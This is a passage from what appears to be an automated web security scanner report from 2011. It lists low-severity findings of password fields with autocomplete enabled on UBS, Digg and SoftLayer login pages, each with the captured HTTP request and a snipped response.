GET /login?_URI=aHR0cDovL2NsaWVudHBvcnRhbC5pYmIudWJzLmNvbS9wb3J0YWwvaW5kZXguaHRtP3BhZ2U9aG9tZQ%3D%3D HTTP/1.1
Host: clientlogin.ibb.ubs.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981875202:ss=1309981804815

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:51:28 GMT
Server: Apache
Pragma: no-cache
Cache-control: no-cache
P3P: CP="OTI DSP COR BUS CUR OUR"
Connection: close
Content-Type: text/html; charset=iso-8859-1
Expires: Wed, 06 Jul 2011 13:51:28 GMT
Content-Length: 6419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<div class="formElement" style="border-top: 2px solid #99adc2;">
                   <form name="login_form" action="/login" method="post">
                   <input type="hidden" name="_URI" value="aHR0cDovL2NsaWVudHBvcnRhbC5pYmIudWJzLmNvbS9wb3J0YWwvaW5kZXguaHRtP3BhZ2U9aG9tZQ==" />
...[SNIP]...
</label><input name="_A2" id="password" type="password" class="textField" value="" /></p>
...[SNIP]...

11.2. http://digg.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /

Issue detail

The page contains a form with no action attribute, which therefore submits to the page's own URL. The form contains the following password field with autocomplete enabled: password

Request

GET / HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: imp_id=be4697b47d58b1200ef3f6956c8cc49e2813419339d6fd7bb526092b66b1dc13; expires=Thu, 07-Jul-2011 11:37:07 GMT; path=/; domain=digg.com
X-Digg-Time: D=237528 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 101255

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- All Topics
- The Latest News Headlines, Videos and Images
</title>

<met
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

11.3. http://digg.com/login

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /login

Issue detail

The page contains a form with no action attribute, which therefore submits to the page's own URL. The form contains the following password field with autocomplete enabled: password

Request

GET /login HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24276 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8609

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

11.4. http://digg.com/login

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /login

Issue detail

The page contains a form with the following action URL: http://digg.com/ajax/auth/prepare/digg. The form contains the following password field with autocomplete enabled: password

Request

GET /login HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24276 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8609

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</ul>
<form id="login" method="post" action="/ajax/auth/prepare/digg" class="digg-form group invite-form">
<input type="hidden" name="sn" value="">
...[SNIP]...
</label>
<input type="password" name="password" class="text-input placeholder-input" tabindex="2" id="password">
</span>
...[SNIP]...

11.5. http://digg.com/register

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /register

Issue detail

The page contains a form with no action attribute, which therefore submits to the page's own URL. The form contains the following password field with autocomplete enabled: password

Request

GET /register HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=38879 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10144

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

11.6. http://digg.com/register

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /register

Issue detail

The page contains a form with the following action URL: http://digg.com/ajax/auth/register. The form contains the following password field with autocomplete enabled: password-register

Request

GET /register HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=38879 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10144

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</ul>
<form id="register" method="post" action="/ajax/auth/register" class="digg-form group invite-form">
<input type="hidden" name="sn" value="">
...[SNIP]...
</label>
<input type="password" name="password-register" id="password-register" class="text-input placeholder-input" tabindex="3">
</span>
...[SNIP]...

11.7. http://digg.com/search

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /search

Issue detail

The page contains a form with no action attribute, which therefore submits to the page's own URL. The form contains the following password field with autocomplete enabled: password

Request

GET /search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=27180 10.2.129.226
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8308

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Search
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, pol
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

11.8. http://digg.com/submit

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with no action attribute, which therefore submits to the page's own URL. The form contains the following password field with autocomplete enabled: password

Request

GET /submit?phase=2&url=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&title=presspass+controls+-+Microsoft+Search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=27224 10.2.129.76
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8985

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

11.9. http://digg.com/submit

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with no action attribute, which therefore submits to the page's own URL. The form contains the following password field with autocomplete enabled: password

Request

GET /submit?phase=2&url=https://www.microsoft.com/presspass/presskits/DCU/default.aspx HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:16:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24761 10.2.128.235
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 8620

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

11.10. http://digg.com/submit

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with no action attribute, which therefore submits to the page's own URL. The form contains the following password field with autocomplete enabled: password

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=21932 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8554

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

11.11. http://digg.com/topic

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /topic

Issue detail

The page contains a form with no action attribute, which therefore submits to the page's own URL. The form contains the following password field with autocomplete enabled: password

Request

GET /topic HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=31422 10.2.129.226
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12469

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

11.12. http://digg.com/upcoming

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /upcoming

Issue detail

The page contains a form (class "hidden") with no action attribute, so it submits to the page's own URL. The form contains the following password field with autocomplete enabled: password (id password-saved).

Request

GET /upcoming HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: imp_id=d49aeb50a0490b4b7e1f800682c23d942b50abde233eda6a7b26c684f1cf95d6; expires=Thu, 07-Jul-2011 11:37:07 GMT; path=/; domain=digg.com
X-Digg-Time: D=300792 10.2.129.80
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 98962

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- All Topics
- Upcoming News Headlines, Videos and Images
</title>

<meta
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

11.13. https://foton-ewm-es.ubs.com/safe-login/Login

Summary

Severity:   Low
Confidence:   Certain
Host:   https://foton-ewm-es.ubs.com
Path:   /safe-login/Login

Issue detail

The page contains a form (LoginForm) with the following action URL: /safe-login/Login?handler=SAFELogin&locale=es_ES. The form contains the following password field with autocomplete enabled: SAFEUserPassword.

Request

GET /safe-login/Login?handler=SAFEGetLogin HTTP/1.1
Host: foton-ewm-es.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response




<html>
<head>
<title>Bienvenido a UBS Bank, S.A.</title>
<meta pageName='login-Login'>
<meta serviceTime='0'>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link
...[SNIP]...
</td>
                                    <FORM name="LoginForm" method="post" action="/safe-login/Login?handler=SAFELogin&locale=es_ES">
                                    <INPUT type="hidden" name="handler" value="SAFELogin">
...[SNIP]...
<td align="right">
           <INPUT type="password" name="SAFEUserPassword" value='' size='20' maxlength='20'><br>
...[SNIP]...

11.14. https://fundgate.ubs.com/GIS/Default.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://fundgate.ubs.com
Path:   /GIS/Default.aspx

Issue detail

The page contains a form (login) with the following action URL: /webauthentication. The form contains the following password fields with autocomplete enabled: pin and tokencode. The second field, judging by its name, takes a one-time token code, which a browser has no reason to remember.

Request

GET /GIS/Default.aspx HTTP/1.1
Host: fundgate.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:09:06 GMT
Server: Apache
Pragma: no-cache
Cache-control: no-cache,max-age=0,must-revalidate
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Expires: 0
Content-Length: 11137
Content-Type: text/html
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
   <meta name="robots" content="noindex,nofollow"><title>UBS Global Asset Managem
...[SNIP]...
<div class="gkkContent">
                                                                               <FORM name="login" action="/webauthentication" method="POST">
                                                                                   <INPUT TYPE=HIDDEN NAME="stage" VALUE="useridandpasscode">
...[SNIP]...
<td width="210"><input NAME="pin" VALUE="" MAXLENGTH=16 style='width:200px;text-align:left;' type='password' class='waEntryfield'></td>
...[SNIP]...
<td width="210"><input NAME="tokencode" VALUE="" MAXLENGTH=16 onkeypress="return loginpresskey(event);" style='width:200px;text-align:left;' type='password' class='waEntryfield'></td>
...[SNIP]...

11.15. https://manage.softlayer.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://manage.softlayer.com
Path:   /

Issue detail

The page contains a form (index_form) with the following action URL: https://manage.softlayer.com/index/index. The form contains the following password field with autocomplete enabled: data[User][password].

Request

GET / HTTP/1.1
Host: manage.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:20:43 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 18394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" version="XHTML+RDFa 1.0" xml:lang="en-us">
<head>
...[SNIP]...
</div>

<form id="index_form" name="data[index][index]_form" action="https://manage.softlayer.com/index/index" method="post"> <table cellpadding="0" cellspacing="0" border="0" width="95%">
...[SNIP]...
<span class="Text11Pt"><input type="password" id="user_password" name="data[User][password]" size="12" style="margin-bottom: 6px;" tabIndex="2" /></span>
...[SNIP]...

11.16. https://manage.softlayer.com/Sales/orderComputingInstance

Summary

Severity:   Low
Confidence:   Certain
Host:   https://manage.softlayer.com
Path:   /Sales/orderComputingInstance

Issue detail

The page contains a form (index_form) with the following action URL: https://manage.softlayer.com/index/index. The form contains the following password field with autocomplete enabled: data[User][password].

Request

GET /Sales/orderComputingInstance HTTP/1.1
Host: manage.softlayer.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1306442258.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __qca=P0-1683070318-1308913155755; _mkto_trk=id:220-ESA-932&token:_mch-softlayer.com-1306437485169-98953; __utma=1.1168266774.1306437626.1306442258.1308913135.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:14:55 GMT
Server: Apache
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 18438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" version="XHTML+RDFa 1.0" xml:lang="en-us">
<head>
...[SNIP]...
</div>

<form id="index_form" name="data[index][index]_form" action="https://manage.softlayer.com/index/index" method="post"> <table cellpadding="0" cellspacing="0" border="0" width="95%">
...[SNIP]...
<span class="Text11Pt"><input type="password" id="user_password" name="data[User][password]" size="12" style="margin-bottom: 6px;" tabIndex="2" /></span>
...[SNIP]...

11.17. https://manage.softlayer.com/index/index

Summary

Severity:   Low
Confidence:   Certain
Host:   https://manage.softlayer.com
Path:   /index/index

Issue detail

The page contains a form (index_form) with the following action URL: https://manage.softlayer.com/index/index. The form contains the following password field with autocomplete enabled: data[User][password].

Request

GET /index/index HTTP/1.1
Host: manage.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:20:45 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 18404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" version="XHTML+RDFa 1.0" xml:lang="en-us">
<head>
...[SNIP]...
</div>

<form id="index_form" name="data[index][index]_form" action="https://manage.softlayer.com/index/index" method="post"> <table cellpadding="0" cellspacing="0" border="0" width="95%">
...[SNIP]...
<span class="Text11Pt"><input type="password" id="user_password" name="data[User][password]" size="12" style="margin-bottom: 6px;" tabIndex="2" /></span>
...[SNIP]...

11.18. http://manage.softlayer.mobi/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://manage.softlayer.mobi
Path:   /

Issue detail

The page contains a form (index_form) with the following action URL: http://manage.softlayer.mobi/index/index?cacheKey=. The form contains the following password field with autocomplete enabled: data[User][password]. Note that both the page and the form action use plain http, so the password is also submitted in cleartext.

Request

GET / HTTP/1.1
Host: manage.softlayer.mobi
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:09 GMT
Server: Apache
Content-Length: 1832
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<title>SoftLayer - Mobile Portal Login</title>
<link rel="stylesheet" type="text/css
...[SNIP]...
<center>
<form id="index_form" name="data[index][index?cacheKey=]_form" action="http://manage.softlayer.mobi/index/index?cacheKey=" method="post"> <center>
...[SNIP]...
<BR>
<input type="password" id="user_password" name="data[User][password]" style="font-size:x-small" class="logintext" tabIndex="2" size="10" /><BR>
...[SNIP]...

11.19. https://onlineservices.ubs.com/olsauth/ex/pbl/lo

Summary

Severity:   Low
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /olsauth/ex/pbl/lo

Issue detail

The page contains a form (loginForm) with the following action URL: /olsauth/ex/pbl/ubso/pl. The form contains the following password field with autocomplete enabled: password.

Request

GET /olsauth/ex/pbl/lo HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:01 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"


<html>
   
   <HEAD>
       <title>Online Services Login</title>
       <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
       <SCRIPT language="JavaScript" SRC='/olsauth/
...[SNIP]...
<!-------------------------------->                
                       <form name="loginForm" id="loginForm" method="post" action="/olsauth/ex/pbl/ubso/pl">    
                           

<!---------------------------------->
...[SNIP]...
<TD style="WIDTH: 151px" align="right" colSpan="4" height="17">
           <input type="password" name="password" maxlength="15" tabindex="2" value="" style="height:15px;width:144px;WIDTH: 144px; HEIGHT: 15px">                                    
       </TD>
...[SNIP]...

11.20. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfp

Summary

Severity:   Low
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /olsauth/ex/pbl/ubso/dfp

Issue detail

The page contains a form (loginForm) with the following action URL: /olsauth/ex/pbl/ubso/pl. The form contains the following password field with autocomplete enabled: password.

Request

GET /olsauth/ex/pbl/ubso/dfp HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:07:59 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"


<html>
   
   <HEAD>
       <title>Online Services Login</title>
       <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
       <SCRIPT language="JavaScript" SRC='/olsauth/
...[SNIP]...
<!-------------------------------->                
                       <form name="loginForm" method="post" action="/olsauth/ex/pbl/ubso/pl">                    
                           

<!---------------------------------->
...[SNIP]...
<TD style="WIDTH: 151px" align="right" colSpan="4" height="17">
           <input type="password" name="password" maxlength="15" tabindex="2" value="" style="height:15px;width:144px;WIDTH: 144px; HEIGHT: 15px">                                    
       </TD>
...[SNIP]...

11.21. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfu

Summary

Severity:   Low
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /olsauth/ex/pbl/ubso/dfu

Issue detail

The page contains a form (forgotUserNameForm) with the following action URL: /olsauth/ex/pbl/ubso/pfu. The form contains the following password field with autocomplete enabled: userPassword.

Request

GET /olsauth/ex/pbl/ubso/dfu HTTP/1.1
Host: onlineservices.ubs.com
Connection: keep-alive
Referer: https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dl
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981931097:ss=1309981804815; NavLB_PQ=quotes-public1.ubs.com

Response

HTTP/1.1 200 OK
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 13:52:26 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
Content-Length: 28205


<html>
   
   <HEAD>
       <title>Online Services Login</title>
       <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
       <SCRIPT language="JavaScript" SRC='/olsauth/
...[SNIP]...
<!------------------------------->                                        
                                   <form name="forgotUserNameForm" method="post" action="/olsauth/ex/pbl/ubso/pfu">                                        
                                       

   <TABLE cellSpacing="0" cellPadding="0" width="100%" border="0">
...[SNIP]...
<TD width="50%">
<input type="password" name="userPassword" maxlength="15" value="" style="height:15px;width:144px;WIDTH: 144px; HEIGHT: 15px">                                    
                       </TD>
...[SNIP]...

11.22. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfu

Summary

Severity:   Low
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /olsauth/ex/pbl/ubso/dfu

Issue detail

The page contains a second form (loginForm, on the same page as 11.21) with the following action URL: /olsauth/ex/pbl/ubso/pl. The form contains the following password field with autocomplete enabled: password.

Request

GET /olsauth/ex/pbl/ubso/dfu HTTP/1.1
Host: onlineservices.ubs.com
Connection: keep-alive
Referer: https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dl
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981931097:ss=1309981804815; NavLB_PQ=quotes-public1.ubs.com

Response

HTTP/1.1 200 OK
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 13:52:26 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
Content-Length: 28205


<html>
   
   <HEAD>
       <title>Online Services Login</title>
       <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
       <SCRIPT language="JavaScript" SRC='/olsauth/
...[SNIP]...
<!-------------------------------->                
                       <form name="loginForm" method="post" action="/olsauth/ex/pbl/ubso/pl">                    
                           

<!---------------------------------->
...[SNIP]...
<TD style="WIDTH: 151px" align="right" colSpan="4" height="17">
           <input type="password" name="password" maxlength="15" tabindex="2" value="" style="height:15px;width:144px;WIDTH: 144px; HEIGHT: 15px">                                    
       </TD>
...[SNIP]...

11.23. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dl

Summary

Severity:   Low
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /olsauth/ex/pbl/ubso/dl

Issue detail

The page contains a form (loginForm) with the following action URL: /olsauth/ex/pbl/ubso/pl. The form contains the following password field with autocomplete enabled: password.

Request

GET /olsauth/ex/pbl/ubso/dl HTTP/1.1
Host: onlineservices.ubs.com
